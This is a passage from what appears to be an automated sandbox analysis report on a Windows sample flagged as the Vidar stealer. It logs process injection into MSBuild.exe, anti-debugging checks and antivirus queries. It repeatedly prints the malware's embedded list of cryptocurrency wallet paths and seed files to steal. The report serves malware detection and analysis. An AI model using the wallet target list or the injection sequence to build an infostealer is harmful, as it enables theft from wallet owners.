_2_00417A40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004176E0 mov eax, dword ptr fs:[00000030h]4_2_004176E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00402000 lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,GetProcessHeap,RtlAllocateHeap,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenA,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,VirtualProtect,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,4_2_00402000
                        Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041ECC8 SetUnhandledExceptionFilter,4_2_0041ECC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0041D12F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041CAF5 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0041CAF5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C59B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C59B66C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C59B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C59B1F7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C74AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C74AC62
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6512, type: MEMORYSTR
                        Allocates memory in foreign processes
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Contains functionality to inject code into remote processes
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040ED80 memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,4_2_0040ED80
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                        Searches for specific processes (likely to inject)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,4_2_00411400
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004112F0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_004112F0
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 420000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 428000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 63D000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 63E000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 11CF008Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C794760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,4_2_6C794760
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00401000 cpuid 4_2_00401000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,4_2_0040FC30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041A440 GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,4_2_0041A440
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040FAE0 GetProcessHeap,HeapAlloc,GetUserNameA,4_2_0040FAE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040FBC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,4_2_0040FBC0
                        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iles%\Windows Defender\MsMpeng.exe
                        Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 0.2.file.exe.4579110.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.39e31c0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3a109f0.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.4579110.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.39e31c0.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.45a6940.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.45a6940.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3a109f0.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6512, type: MEMORYSTR
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000000.1682009085.0000000000022000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: XhJAxXnjj5
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: info.seco
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                        Source: MSBuild.exe, 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: seed.seco
                        Source: file.exe, 00000000.00000002.1705915663.0000000005400000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                        Source: MSBuild.exe, 00000004.00000002.2346186542.0000000001688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger 